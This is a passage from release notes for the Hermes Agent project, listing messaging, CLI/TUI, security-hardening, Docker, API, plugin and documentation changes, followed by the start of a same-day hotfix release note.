- Avoid duplicate text after auto-TTS voice replies. ([#28509](https://github.com/NousResearch/hermes-agent/pull/28509))
- Mark final voice reply notify-worthy so Telegram delivers it audibly. ([#28504](https://github.com/NousResearch/hermes-agent/pull/28504))
### Discord
- Recover Windows voice opus decoding. ([#33182](https://github.com/NousResearch/hermes-agent/pull/33182))
- `allow_any_attachment` config to accept arbitrary file types. ([#27245](https://github.com/NousResearch/hermes-agent/pull/27245))
- Transcribe native voice notes. ([#28993](https://github.com/NousResearch/hermes-agent/pull/28993))
- Define UI view classes after lazy install. ([#28817](https://github.com/NousResearch/hermes-agent/pull/28817))
### Signal / Matrix / Feishu / Slack / WeCom
- Signal: `require_mention` filter for group chats. ([#28574](https://github.com/NousResearch/hermes-agent/pull/28574))
- Matrix: warn on clock-skew silent message drops. ([#27330](https://github.com/NousResearch/hermes-agent/pull/27330))
- Matrix E2EE installs full dep set; plugins respect `is_connected`. ([#31688](https://github.com/NousResearch/hermes-agent/pull/31688))
- Feishu: require webhook auth secret + honor config extras. ([#30746](https://github.com/NousResearch/hermes-agent/pull/30746))
- Feishu: enforce auth and chat binding for approval buttons. ([#30744](https://github.com/NousResearch/hermes-agent/pull/30744))
- Slack: socket recovery + Windows restart dedupe. ([#28873](https://github.com/NousResearch/hermes-agent/pull/28873))
- WeCom: safe-parse untrusted XML. ([#32442](https://github.com/NousResearch/hermes-agent/pull/32442))
### DingTalk / Webhooks / Microsoft Graph
- DingTalk: transcribe native voice notes. ([#28993](https://github.com/NousResearch/hermes-agent/pull/28993))
- Webhook: enforce `INSECURE_NO_AUTH` safety rail on dynamic route reloads. ([#30863](https://github.com/NousResearch/hermes-agent/pull/30863))
- Webhook: restrict default toolset capabilities. ([#30745](https://github.com/NousResearch/hermes-agent/pull/30745))
- Microsoft Graph: harden webhook auth requirements. ([#30169](https://github.com/NousResearch/hermes-agent/pull/30169))
---
## 🖥️ CLI & TUI
### CLI
- `/update` slash command in CLI and TUI. ([#23854](https://github.com/NousResearch/hermes-agent/pull/23854))
- Update auto-rollback when post-pull syntax check fails. ([#28669](https://github.com/NousResearch/hermes-agent/pull/28669))
- `--branch` flag for `hermes update`. (@jquesnelle) ([#29591](https://github.com/NousResearch/hermes-agent/pull/29591))
- `/exit --delete` flag to remove session on quit. (salvage of [#17665](https://github.com/NousResearch/hermes-agent/pull/17665)) ([#27101](https://github.com/NousResearch/hermes-agent/pull/27101))
- `▶ N` indicator in status bar for running `/background` tasks. ([#27175](https://github.com/NousResearch/hermes-agent/pull/27175))
- Live background terminal-process count in status bar. ([#32061](https://github.com/NousResearch/hermes-agent/pull/32061))
- Append session recap to `/status` output. (salvage of [#18587](https://github.com/NousResearch/hermes-agent/pull/18587)) ([#27176](https://github.com/NousResearch/hermes-agent/pull/27176))
- Configurable paste-collapse thresholds (TUI + CLI). (salvage [#29723](https://github.com/NousResearch/hermes-agent/pull/29723)) ([#32087](https://github.com/NousResearch/hermes-agent/pull/32087))
- `/resume` accepts position numbers. ([#31709](https://github.com/NousResearch/hermes-agent/pull/31709))
- Bring tool-call display back — verbose mode, specific failure reasons, todo progress. ([#31293](https://github.com/NousResearch/hermes-agent/pull/31293))
- Validate runtime token refresh in Qwen auth status. ([#31196](https://github.com/NousResearch/hermes-agent/pull/31196))
### TUI
- **TUI session orchestrator** — multiple live sessions in one TUI window. (salvages [#27642](https://github.com/NousResearch/hermes-agent/pull/27642)) ([#32980](https://github.com/NousResearch/hermes-agent/pull/32980))
- `mouse_tracking` DEC mode presets. (salvage of [#26681](https://github.com/NousResearch/hermes-agent/pull/26681) by @OutThisLife) ([#30084](https://github.com/NousResearch/hermes-agent/pull/30084))
- Termux scrollback preservation + touch-friendly defaults. ([#28910](https://github.com/NousResearch/hermes-agent/pull/28910))
- Full assistant text in scrollback (no history truncation). ([#28829](https://github.com/NousResearch/hermes-agent/pull/28829))
- Preserve scrollback when branching sessions. ([#30162](https://github.com/NousResearch/hermes-agent/pull/30162))
- Preserve Python dunder identifiers in markdown. ([#28582](https://github.com/NousResearch/hermes-agent/pull/28582))
- Active profile shown in TUI prompt. ([#28581](https://github.com/NousResearch/hermes-agent/pull/28581))
- Improve Charizard completion menu contrast. ([#28346](https://github.com/NousResearch/hermes-agent/pull/28346))
- Stop slash dropdown chopping last char of `/goal`. ([#31311](https://github.com/NousResearch/hermes-agent/pull/31311))
- Clipboard copy on linux/wayland. ([#29342](https://github.com/NousResearch/hermes-agent/pull/29342))
- Anchor `splitReasoning` unclosed-tag regex; stop eating last paragraph. ([#29426](https://github.com/NousResearch/hermes-agent/pull/29426))
- Surface verbose tool details. ([#30225](https://github.com/NousResearch/hermes-agent/pull/30225))
- Load Linux skills on Termux + salvage @adybag14-cyber's Termux gates. ([#30166](https://github.com/NousResearch/hermes-agent/pull/30166))
- Handle images with codex app-server. ([#31220](https://github.com/NousResearch/hermes-agent/pull/31220))
- Refresh virtual transcript on viewport resize. ([#31077](https://github.com/NousResearch/hermes-agent/pull/31077))
- Ignore late thinking deltas after completion. ([#31055](https://github.com/NousResearch/hermes-agent/pull/31055))
- Commit composer input bursts immediately. ([#31053](https://github.com/NousResearch/hermes-agent/pull/31053))
- Log parent gateway lifecycle exits. ([#31051](https://github.com/NousResearch/hermes-agent/pull/31051))
- Clear TTS env var on voice off + TTS indicator in status bar. ([#30987](https://github.com/NousResearch/hermes-agent/pull/30987))
- Pass `--expose-gc` as node argv instead of NODE_OPTIONS. ([#29998](https://github.com/NousResearch/hermes-agent/pull/29998))
- Align composer cursorLayout with wrap-ansi to kill multiline cursor drift. ([#27489](https://github.com/NousResearch/hermes-agent/pull/27489))
- Harden Terminal.app rendering and color paths. ([#27251](https://github.com/NousResearch/hermes-agent/pull/27251))
- Keep `/goal` verdict out of compact status row. ([#27971](https://github.com/NousResearch/hermes-agent/pull/27971))
- Clamp curses color 8 for 8-color terminals (Docker). ([#30260](https://github.com/NousResearch/hermes-agent/pull/30260))
---
## 🔒 Security & Reliability
### Promptware & memory hardening
- **Promptware defense** — shared threat patterns + memory load-time scan + tool-result delimiters. ([#32269](https://github.com/NousResearch/hermes-agent/pull/32269))
- Expand memory content scanning patterns to parity with skills guard. ([#9151](https://github.com/NousResearch/hermes-agent/pull/9151))
- Harden Skills Guard multi-word prompt patterns. (@YLChen-007) ([#26852](https://github.com/NousResearch/hermes-agent/pull/26852))
- Split cron scanner so skill prose stops false-positiving exfil patterns. ([#32339](https://github.com/NousResearch/hermes-agent/pull/32339))
### File safety
- Protect Hermes control-plane files from prompt injection (`auth.json`, `config.yaml`, `webhook_subscriptions.json`, `mcp-tokens/`). (salvages @PratikRai0101's [#14157](https://github.com/NousResearch/hermes-agent/pull/14157)) ([#30397](https://github.com/NousResearch/hermes-agent/pull/30397))
- Write-deny `<root>/.env` when running under a profile. ([#29687](https://github.com/NousResearch/hermes-agent/pull/29687))
- Defense-in-depth read-deny on credential stores. (salvages [#17659](https://github.com/NousResearch/hermes-agent/pull/17659) + [#8055](https://github.com/NousResearch/hermes-agent/pull/8055)) ([#30721](https://github.com/NousResearch/hermes-agent/pull/30721))
- TTS `output_path` traversal + update ZIP symlink reject. (salvage [#6693](https://github.com/NousResearch/hermes-agent/pull/6693) + [#15881](https://github.com/NousResearch/hermes-agent/pull/15881)) ([#32056](https://github.com/NousResearch/hermes-agent/pull/32056))
- Reject symlinked audio inputs. ([#10082](https://github.com/NousResearch/hermes-agent/pull/10082))
### Credential safety
- Avoid persisting borrowed credential secrets — runtime env-sourced keys no longer leak into `auth.json`. ([#31416](https://github.com/NousResearch/hermes-agent/pull/31416))
- Validate Nous Portal `inference_base_url` against host allowlist. (salvages [#27612](https://github.com/NousResearch/hermes-agent/pull/27612)) ([#30611](https://github.com/NousResearch/hermes-agent/pull/30611))
- Harden API server key placeholder handling. ([#30738](https://github.com/NousResearch/hermes-agent/pull/30738))
- Harden Google Chat OAuth credential persistence. (@Zyrixtrex) ([#24788](https://github.com/NousResearch/hermes-agent/pull/24788))
- xAI OAuth: pin inference `base_url` to x.ai origin. ([#28952](https://github.com/NousResearch/hermes-agent/pull/28952))
- Quarantine dead OAuth tokens on terminal refresh failure (xAI, Codex, MiniMax). ([#28116](https://github.com/NousResearch/hermes-agent/pull/28116), [#28118](https://github.com/NousResearch/hermes-agent/pull/28118), [#28119](https://github.com/NousResearch/hermes-agent/pull/28119))
### Supply-chain
- **On-demand supply-chain audit via OSV.dev** — `hermes audit`. ([#31460](https://github.com/NousResearch/hermes-agent/pull/31460))
- `hermes update` syntax-validates critical files post-pull, auto-rollback on failure. ([#28669](https://github.com/NousResearch/hermes-agent/pull/28669))
- Quarantine `hermes.exe` vs concurrent Windows instance. ([#26677](https://github.com/NousResearch/hermes-agent/pull/26677))
### Other hardening
- Restrict default webhook toolset capabilities. ([#30745](https://github.com/NousResearch/hermes-agent/pull/30745))
- Harden Microsoft Graph webhook auth requirements. ([#30169](https://github.com/NousResearch/hermes-agent/pull/30169))
- Require source CIDR allowlisting for public msgraph webhook binds. ([#33722](https://github.com/NousResearch/hermes-agent/pull/33722))
- Require `API_SERVER_KEY` before dispatching API server work. ([#33232](https://github.com/NousResearch/hermes-agent/pull/33232))
- env_passthrough: apply GHSA-rhgp-j443-p4rf filter to config.yaml path. (@roadhero) ([#27794](https://github.com/NousResearch/hermes-agent/pull/27794))
- Dashboard + WeCom: restrict markdown link schemes; safe-parse untrusted XML. ([#32442](https://github.com/NousResearch/hermes-agent/pull/32442))
- Salvage project-plugin RCE bypass fix from PR [#29311](https://github.com/NousResearch/hermes-agent/pull/29311) (GHSA-5qr3-c538-wm9j). ([#30837](https://github.com/NousResearch/hermes-agent/pull/30837))
- Cross-profile soft guard on file-write tools + system-prompt hint. ([#31290](https://github.com/NousResearch/hermes-agent/pull/31290))
- Reject unsafe tar members in Android psutil compatibility installer. ([#33742](https://github.com/NousResearch/hermes-agent/pull/33742))
- Reject non-regular tar members during tirith auto-install. ([#33786](https://github.com/NousResearch/hermes-agent/pull/33786))
---
## 🪟 Native Windows (Beta Continued)
- Complete Windows bootstrap — `dep_ensure` + `install.ps1` + detection. (@alt-glitch) ([#27845](https://github.com/NousResearch/hermes-agent/pull/27845))
- `install.ps1`: strip BOM, `-Commit`/`-Tag` pin params, harden git ops. (@jquesnelle) ([#28169](https://github.com/NousResearch/hermes-agent/pull/28169))
- Consolidate ACP browser bootstrap into `install.{sh,ps1}`. (@alt-glitch) ([#27851](https://github.com/NousResearch/hermes-agent/pull/27851))
- `hermes update` quarantines live `hermes.exe`. ([#26677](https://github.com/NousResearch/hermes-agent/pull/26677))
- Discord voice opus decoding on Windows. ([#33182](https://github.com/NousResearch/hermes-agent/pull/33182))
- Windows Docker Desktop compatible compose file. (@Sunil123135) ([#31031](https://github.com/NousResearch/hermes-agent/pull/31031))
---
## 🖥️ Web Dashboard
- Hardened Slack socket recovery + Windows restart dedupe. ([#28873](https://github.com/NousResearch/hermes-agent/pull/28873))
- Web dashboard: migrate checkboxes to `@nous-research/ui` + design-system polish. (@austinpickett) ([#28814](https://github.com/NousResearch/hermes-agent/pull/28814))
- Web dashboard: collapsible sidebar. (@austinpickett) ([#33421](https://github.com/NousResearch/hermes-agent/pull/33421))
- Dashboard typography & contrast pass. (salvage of [#28832](https://github.com/NousResearch/hermes-agent/pull/28832)) ([#30714](https://github.com/NousResearch/hermes-agent/pull/30714))
- Skills page: lazy-fetch catalog instead of bundling 34MB into JS. ([#33809](https://github.com/NousResearch/hermes-agent/pull/33809))
---
## 🐳 Docker
- **s6-overlay container supervision** — abstract `ServiceManager` protocol (systemd/launchd/Windows/s6 backends), per-profile gateway supervision in-container, container-restart reconciliation, hadolint/shellcheck CI. (salvage of [#30136](https://github.com/NousResearch/hermes-agent/pull/30136), @benbarclay) ([#31760](https://github.com/NousResearch/hermes-agent/pull/31760))
- Auto-redirect `gateway run` to supervised mode inside the s6 image. (@benbarclay) ([#33583](https://github.com/NousResearch/hermes-agent/pull/33583))
- Tee supervised gateway stdout to docker logs. (@benbarclay) ([#33621](https://github.com/NousResearch/hermes-agent/pull/33621))
- Drop `docker exec` to hermes uid before invoking the CLI. (@benbarclay) ([#33628](https://github.com/NousResearch/hermes-agent/pull/33628))
- Align HOME for dashboard and s6 gateway services. (@Dusk1e) ([#33481](https://github.com/NousResearch/hermes-agent/pull/33481))
- Bake build-time git SHA into image so `hermes dump` reports it. (@benbarclay) ([#33655](https://github.com/NousResearch/hermes-agent/pull/33655))
- `hermes update` prints `docker pull` guidance instead of bogus git error. (@benbarclay) ([#33659](https://github.com/NousResearch/hermes-agent/pull/33659))
- Upgrade Node to 22 LTS via multi-stage from `node:22-bookworm-slim`. (@benbarclay) ([#33060](https://github.com/NousResearch/hermes-agent/pull/33060))
- Drop `build-essential` from apt install. (@benbarclay) ([#33028](https://github.com/NousResearch/hermes-agent/pull/33028))
- Propagate env through s6 to cont-init and main CMD. ([#32412](https://github.com/NousResearch/hermes-agent/pull/32412))
- Targeted chown to preserve host file ownership in `HERMES_HOME`. ([#33033](https://github.com/NousResearch/hermes-agent/pull/33033))
- `mkdir HERMES_HOME` as root in stage2 before chown / privilege drop. ([#33078](https://github.com/NousResearch/hermes-agent/pull/33078))
- chown `ui-tui` and `node_modules` on UID remap so TUI esbuild works. ([#33045](https://github.com/NousResearch/hermes-agent/pull/33045))
- Include `anthropic`, `bedrock`, `azure-identity` extras in image. ([#30504](https://github.com/NousResearch/hermes-agent/pull/30504))
- Stop pushing per-commit SHA tags to Docker Hub. ([#29387](https://github.com/NousResearch/hermes-agent/pull/29387))
- Simplify Docker tagging — push both `:main` and `:latest` on main push. ([#33225](https://github.com/NousResearch/hermes-agent/pull/33225))
- Test slicing across GH actions jobs. (@ethernet8023) ([#30575](https://github.com/NousResearch/hermes-agent/pull/30575))
- Discover agent-browser Chromium binary at boot. ([#33184](https://github.com/NousResearch/hermes-agent/pull/33184))
---
## 🌐 API Server
- **Session control API** — `/api/sessions/*` (list/create/read/patch/delete/fork) + SSE-streaming chat. (salvages [#29302](https://github.com/NousResearch/hermes-agent/pull/29302) by @Codename-11 + multimodal followup by @Schwartz10) ([#33134](https://github.com/NousResearch/hermes-agent/pull/33134))
- `GET /v1/skills` and `/v1/toolsets`. ([#33016](https://github.com/NousResearch/hermes-agent/pull/33016))
- Coerce stringified booleans in stream/store/approval payloads. (salvage [#26639](https://github.com/NousResearch/hermes-agent/pull/26639)) ([#27293](https://github.com/NousResearch/hermes-agent/pull/27293))
- Honor `key_env` in auth-failure fallback resolution. ([#30840](https://github.com/NousResearch/hermes-agent/pull/30840))
---
## 🎟️ ACP (VS Code / Zed / JetBrains)
- Session edit auto-approval modes. (salvage of [#27034](https://github.com/NousResearch/hermes-agent/pull/27034)) ([#27862](https://github.com/NousResearch/hermes-agent/pull/27862))
- Enrich Zed permission cards — command in title + `reject_always`. ([#28148](https://github.com/NousResearch/hermes-agent/pull/28148))
- Replay session history before responding to `session/load`. ([#26957](https://github.com/NousResearch/hermes-agent/pull/26957), [#26943](https://github.com/NousResearch/hermes-agent/pull/26943))
- Plugin-transformed final_response delivered through streaming gate. ([#31433](https://github.com/NousResearch/hermes-agent/pull/31433))
---
## 🔌 Plugin Surface
- `register_tts_provider()` plugin hook. (salvage of [#30420](https://github.com/NousResearch/hermes-agent/pull/30420)) ([#31745](https://github.com/NousResearch/hermes-agent/pull/31745))
- `register_transcription_provider()` hook + `stt.providers` command-provider registry. (salvage of [#30493](https://github.com/NousResearch/hermes-agent/pull/30493)) ([#31907](https://github.com/NousResearch/hermes-agent/pull/31907))
- `register_auxiliary_task()` in PluginContext API. (salvage [#29817](https://github.com/NousResearch/hermes-agent/pull/29817)) ([#31177](https://github.com/NousResearch/hermes-agent/pull/31177))
- Bundled `security-guidance` plugin. ([#33131](https://github.com/NousResearch/hermes-agent/pull/33131))
- Discord and Mattermost migrated to bundled plugins. ([#30591](https://github.com/NousResearch/hermes-agent/pull/30591), [#31748](https://github.com/NousResearch/hermes-agent/pull/31748))
- ntfy as platform plugin. ([#30867](https://github.com/NousResearch/hermes-agent/pull/30867))
- Surface category-namespaced plugins in `hermes plugins list`. ([#27187](https://github.com/NousResearch/hermes-agent/pull/27187))
- Plugin discovery failures raised to WARNING level. ([#28318](https://github.com/NousResearch/hermes-agent/pull/28318))
- `hermes_plugins` included in gateway.log component filter. ([#28313](https://github.com/NousResearch/hermes-agent/pull/28313))
- Seed plugin extras before `is_connected` gate. ([#31703](https://github.com/NousResearch/hermes-agent/pull/31703))
- Dashboard: allowlist plugin assets + denylist subprocess-influencing env vars. ([#32277](https://github.com/NousResearch/hermes-agent/pull/32277))
---
## 📦 Distribution & Install
- Install-method stamping + Docker detection. (@alt-glitch) ([#27843](https://github.com/NousResearch/hermes-agent/pull/27843))
- Nix `#messaging` and `#full` package variants. (@alt-glitch) ([#33108](https://github.com/NousResearch/hermes-agent/pull/33108))
- Pre-load messaging gateway deps via `--extra messaging`. (salvage [#26394](https://github.com/NousResearch/hermes-agent/pull/26394)) ([#27558](https://github.com/NousResearch/hermes-agent/pull/27558))
- Avoid piping installer directly into `iex` (Windows). ([#28347](https://github.com/NousResearch/hermes-agent/pull/28347))
- Ship bundled skills in wheel. ([#28421](https://github.com/NousResearch/hermes-agent/pull/28421))
- Ship dashboard plugin assets in wheel. ([#28406](https://github.com/NousResearch/hermes-agent/pull/28406))
- Make Camofox lazy-installed instead of eager. ([#27055](https://github.com/NousResearch/hermes-agent/pull/27055))
- Wire STT lazy-install into transcription_tools.py. ([#30256](https://github.com/NousResearch/hermes-agent/pull/30256))
---
## 🐛 Notable Bug Fixes (highlights only)
- Match bare custom provider by active base URL in `hermes model`. ([#28908](https://github.com/NousResearch/hermes-agent/pull/28908))
- Route `auxiliary.vision.provider=openai` to api.openai.com, skip text-only main. ([#31452](https://github.com/NousResearch/hermes-agent/pull/31452))
- Lint: skip per-file shell linter when LSP will handle the file. ([#29054](https://github.com/NousResearch/hermes-agent/pull/29054))
- Treat empty credential pool entries as unauthenticated in `/model` picker. ([#28312](https://github.com/NousResearch/hermes-agent/pull/28312))
- Reverted within window: Firecrawl integration tag, send_message @username auto-mentions, Telegram quick-command-only menus, Telegram pin-on-turn.
---
## 🧪 Testing
- Disarm lazy-install probe so `_HAS_FASTER_WHISPER` patches work. ([#30334](https://github.com/NousResearch/hermes-agent/pull/30334))
- Cover default board dashboard pin. ([#28361](https://github.com/NousResearch/hermes-agent/pull/28361))
- Cover `_task_dict` `task_age` fallback. ([#28365](https://github.com/NousResearch/hermes-agent/pull/28365))
- Allowlist `tmp_path` for `kanban_notify` artifact delivery tests. ([#30851](https://github.com/NousResearch/hermes-agent/pull/30851), [#30852](https://github.com/NousResearch/hermes-agent/pull/30852))
- Cover null output stream terminal events in Codex. ([#33137](https://github.com/NousResearch/hermes-agent/pull/33137))
---
## 📚 Documentation
- **30-day docs overhaul** — full correctness audit, every PR in the window covered, Nous Portal weave, sidebar reorg. ([#33782](https://github.com/NousResearch/hermes-agent/pull/33782))
- Dedicated Nous Portal integration page and setup guide. ([#31296](https://github.com/NousResearch/hermes-agent/pull/31296))
- Providers: move Nous Portal first, Google Gemini OAuth last. ([#31287](https://github.com/NousResearch/hermes-agent/pull/31287))
- `session_search` rewrite for single-shape tool. ([#27840](https://github.com/NousResearch/hermes-agent/pull/27840))
- Kanban: document failure_limit, max_retries, inline create shortcuts, goals & kanban settings. ([#28357](https://github.com/NousResearch/hermes-agent/pull/28357), [#28358](https://github.com/NousResearch/hermes-agent/pull/28358), [#28359](https://github.com/NousResearch/hermes-agent/pull/28359), [#28360](https://github.com/NousResearch/hermes-agent/pull/28360), [#28362](https://github.com/NousResearch/hermes-agent/pull/28362))
- Kanban Codex lane skill. ([#28430](https://github.com/NousResearch/hermes-agent/pull/28430))
- xAI OAuth: note X Premium+ also unlocks Grok OAuth. ([#29055](https://github.com/NousResearch/hermes-agent/pull/29055))
- Docs site: Docker audio bridge notes, "Installing more tools in the container", xurl auth HOME in Docker.
- Email: clarify gateway vs Himalaya setup. (@helix4u) ([#33634](https://github.com/NousResearch/hermes-agent/pull/33634))
- Auth docs: replace stale `hermes login` references with `hermes auth add`. ([#32859](https://github.com/NousResearch/hermes-agent/pull/32859))
---
## 👥 Contributors
### Core
- @teknium1 (lead)
### Notable salvages & cherry-picks
- **@benbarclay** — s6-overlay container supervision (29 commits salvaged), Node 22 LTS upgrade, build-essential cleanup, `gateway run` auto-redirect in s6, tee supervised stdout to docker logs, `hermes update` Docker guidance, build-time SHA stamping
- **@OutThisLife** — `mouse_tracking` DEC mode presets
- **@jquesnelle** — Windows installer hardening, `--branch` flag for `hermes update`, install.ps1 BOM strip / commit-pin
- **@alt-glitch** — Windows `dep_ensure` bootstrap, Nix package variants (`.#messaging`, `.#full`), install-method stamping, ACP browser bootstrap consolidation
- **@austinpickett** — `/update` slash command, dashboard checkboxes → `@nous-research/ui`, mobile dashboard polish, collapsible sidebar
- **@ethernet8023** — CI test slicing across GH Actions jobs, TUI clipboard copy fix
- **@kshitijk4poor** — doctor section banner + fail-and-issue helpers extraction, post-tag salvage cluster (curator-fallout, kanban SQLite hardening, install world-readable uv dirs, xAI bare-code paste)
- **@rewbs** — Nous JWT inference switch + refresh-token replay fix
- **@Codename-11** + **@Schwartz10** — session control API (REST + SSE + multimodal followup)
- **@Niraven** — kanban swarm topology helper
- **@Interstellar-code** — kanban worker visibility endpoints
- **@adybag14-cyber** — termux cold-start optimizations (multiple PRs)
- **@qike-ms** — Telegram in-place status edits design
- **@sprmn24** — ntfy adapter
- **@Jaaneek** — xAI Web Search provider plugin
- **@yannsunn** — xAI upstream adapter for `hermes proxy`
- **@Cybourgeoisie** — OpenRouter sticky routing via session_id
- **@memosr** — Nous Portal base_url allowlist validation
- **@Sunil123135** — Windows Docker Desktop compose file
- **@Dusk1e** — Docker HOME alignment for dashboard + s6 gateway services
- **@beardthelion** — opencode-go anthropic_messages routing
- **@YLChen-007** — Skills Guard multi-word prompt patterns
- **@roadhero** — env_passthrough GHSA-rhgp-j443-p4rf filter
- **@Zyrixtrex** — Google Chat OAuth credential persistence hardening
- **@briandevans**, **@tomqiaozc** — defense-in-depth read-deny on credential stores
- **@PratikRai0101** — control-plane file write protection
- **@helix4u**, **@Bartok9**, **@zccyman** — auxiliary fallback ladder components
- **@ms-alan**, **@ticketclosed-wontfix**, **@donovan-yohan** — TUI session orchestrator + follow-ups
- **@daimon-nous[bot]** — cron per-job profile support
- **@bisko** — re-pad `reasoning_content` on cross-provider fallback
### All Contributors
@02356abc, @0xchainer, @0xDevNinja, @0xjackyang, @0xsir0000, @0z1-ghb, @8bit64k, @aaronlab, @AceWattGit,
@ACR27, @adam91holt, @AdamPlatin123, @Ade5954, @AdityaRajeshGadgil, @adybag14-cyber, @AhmetArif0, @ai-hana-ai,
@alaamohanad169-ship-it, @alber70g, @albert748, @alt-glitch, @aqilaziz, @argabor, @asdlem, @austinpickett,
@avifenesh, @awizemann, @B0Tch1, @Bartok9, @BaxBit, @Beandon13, @beardthelion, @benbarclay, @bensargotest-sys,
@binhnt92, @bird, @bisko, @BlackishGreen33, @booker1207, @bradhallett, @briandevans, @Brixyy, @brndnsvr,
@BROCCOLO1D, @btorresgil, @burjorjee, @carltonawong, @Carry00, @chaconne67, @chdlc, @chromalinx, @ChyuWei,
@CipherFrame, @cmullins70, @CNSeniorious000, @codeblackhole1024, @Codename-11, @colin-chang, @counterposition,
@cresslank, @CryptoByz, @cyb0rgk1tty, @Cybourgeoisie, @daizhonggeng, @darvsum, @davidcampbelldc, @deas,
@dgians, @dillweed, @DoGMaTiiC, @donovan-yohan, @draplater, @Drexuxux, @dskwe, @dsr-restyn, @Dusk1e,
@dusterbloom, @duyua9, @egilewski, @el-analista, @eliteworkstation94-ai, @eloklam, @EloquentBrush0x, @emonty,
@emozilla, @erhnysr, @erikengervall, @Erosika, @ether-btc, @ethernet8023, @EvilHumphrey, @fabiosiqueira,
@falasi, @falconexe, @fardoche6, @felix-windsor, @Fewmanism, @ffr31mr, @flamiinngo, @flanny7, @flooryyyy,
@fonhal, @francip, @fujinice, @gianfrancopiana, @glennc, @Glucksberg, @godlin-gh, @Grogger, @guillaumemeyer,
@Gutslabs, @H-Ali13381, @hanzckernel, @haran2001, @hawknewton, @hayka-pacha, @hehehe0803, @helix4u, @HenkDz,
@Hermes, @hermesagent26, @Hinotoi-agent, @hongchen1993, @honor2030, @houenyang-momo, @ht1072, @hueilau,
@iamfoz, @ilonagaja509-glitch, @InB4DevOps, @indigokarasu, @Interstellar-code, @iqdoctor, @iRonin, @Jaaneek,
@JabberELF, @jacevys, @jackey8616, @jackjin1997, @jdelmerico, @jfuenmayor, @Jiahui-Gu, @JimLiu, @joe102084,
@JohnC1009, @jonpol01, @Jpalmer95, @Julientalbot, @justemu, @justincc, @jvinals, @karthikeyann, @kasunvinod,
@kchuang1015, @kenyonxu, @khungate, @kiranvk-2011, @kjames2001, @konsisumer, @kpadilha, @kriscolab,
@krislidimo, @kronexoi, @kshitijk4poor, @kunci115, @Kylejeong2, @kylekahraman, @LaPhilosophie, @leeseoki0,
@lemassykoi, @Lempkey, @LeonJS, @LeonSGP43, @lidge-jun, @LifeJiggy, @liuhao1024, @LizerAIDev, @loicnico96,
@loongfay, @m0n3r0, @malaiwah, @matthewlai, @mavrickdeveloper, @maxmilian, @McClean-Edison, @memosr,
@Mind-Dragon, @momowind, @MoonJuhan, @MoonRay305, @moortekweb-art, @MorAlekss, @ms-alan, @Nami4D,
@nehaaprasaad, @nekwo, @nftpoetrist, @NickLarcombe, @nidhi-singh02, @Niraven, @nnnet, @noctilust, @novax635,
@nthrow, @nv-kasikritc, @nycomar, @OCWC22, @oemtalks, @OmX, @ooovenenoso, @orcool, @oseftg, @outsourc-e,
@OutThisLife, @Paperclip, @PaTTeeL, @pepelax, @phoenixshen, @Pluviobyte, @pnascimento9596, @pochi-gio, @pr7426,
@PratikRai0101, @Prithvi1994, @psionic73, @ptichalouf, @Que0x, @QuenVix, @quocanh261997, @qWaitCrypto, @Qwinty,
@r266-tech, @rak135, @rdasilva1016-ui, @rewbs, @roadhero, @rodrigoeqnit, @RonHillDev, @roycepersonalassistant,
@rudi193-cmd, @RyanRana, @sadiksaifi, @samahn0601, @samggggflynn, @SamuelZ12, @sanghyuk-seo-nexcube,
@Saurav0989, @savanne-kham, @Schrotti77, @Schwartz10, @SerenityTn, @sgtworkman, @sharziki, @shaun0927,
@shellybotmoyer, @shunsuke-hikiyama, @SimbaKingjoe, @SimoKiihamaki, @sir-ad, @Slimydog21, @slowtokki0409,
@Soju06, @someaka, @soynchux, @sprmn24, @Stark-X, @steezkelly, @stepanov1975, @stephenschoettler,
@stevehq26-bot, @steveonjava, @Strontvod, @subtract0, @Sunil123135, @superearn-fisher, @Sylw3ster, @tchanee,
@that-ambuj, @thedavidmurray, @TheOnlyMika, @therahul-yo, @thewillhuang, @ticketclosed-wontfix, @Timur00Kh,
@tomqiaozc, @Tosko4, @Tranquil-Flow, @tw2818, @uzunkuyruk, @vaddisrinivas, @vanthinh6886, @vgocoder,
@victorGPT, @vynxevainglory-ai, @waefrebeorn, @walli, @wangpuv, @wanwan2qq, @wesleysimplicio, @worlldz,
@wpengpeng168, @WuKongAI-CMU, @wuli666, @Wysie, @wysie, @xxxigm, @yannsunn, @YanzhongSu, @YarrowQiao, @ygd58,
@YLChen-007, @yoniebans, @yu-xin-c, @YuanHanzhong, @zapabob, @zccyman, @ziliangpeng, @zwolniony, @Zyrixtrex
---
**Full Changelog**: [v2026.5.16...v2026.5.28](https://github.com/NousResearch/hermes-agent/compare/v2026.5.16...v2026.5.28)
+110
View File
@@ -0,0 +1,110 @@
# Hermes Agent v0.15.1 (v2026.5.29)
**Release Date:** May 29, 2026
**Since v0.15.0:** 28 commits · 21 merged PRs · hotfix release · 9 contributors
> **The Patch Release.** A same-day hotfix for v0.15.0. Headline fix: the dashboard infinite-reload loop that hit anyone running v0.15.0 in loopback mode (Docker, hosted Hermes, fresh installs). A handful of other v0.15.0 follow-ups go along for the ride — kanban worker SIGTERM, `/model` picker unification, `/yolo` session bypass, the full 19,932-entry skills.sh catalog, `.md` media delivery restoration, gateway probe-stepdown safety, web-URL redaction passthrough, kanban worker vision on referenced images, hindsight observation-default. Docker users get an explicit `--insecure` opt-in env var (no more bind-host inference), MCP server bare-command PATH resolution, and arm64 PR-build cache fixes.
---
## ✨ Highlights
- **Dashboard 401 reload loop fixed** — In loopback mode the dashboard's identity probe (`/api/auth/me`) returns 401 by design, but v0.15.0's stale-token reload guard treated every 401 as a rotated session token and full-page-reloaded to pick up a fresh one. Every successful sibling call cleared the one-shot reload guard, so the page reload-looped forever (Firefox: "Navigated to /sessions" storm; Chrome: React re-render storm). Fix adds an `allowUnauthorized` opt-out to `fetchJSON` that skips only the loopback stale-token reload — 401 still throws so `AuthWidget` swallows it, gated-mode `login_url` redirects are unaffected. Closes [#34206](https://github.com/NousResearch/hermes-agent/issues/34206), [#34202](https://github.com/NousResearch/hermes-agent/issues/34202). ([#30698](https://github.com/NousResearch/hermes-agent/pull/30698) — @austinpickett)
- **Docker dashboard `--insecure` is now an explicit env opt-in, never derived from bind host** — Previously the Docker entrypoint inferred `--insecure` when the dashboard bound to a non-loopback host. That conflated "I want LAN access" with "I want to disable the same-origin guard." The fix splits them: bind host is bind host, and disabling the dashboard's loopback auth requires an explicit `HERMES_DASHBOARD_INSECURE=1`. Existing setups that genuinely wanted insecure binding must now set the env var. ([#34188](https://github.com/NousResearch/hermes-agent/pull/34188), [#34204](https://github.com/NousResearch/hermes-agent/pull/34204) — @benbarclay)
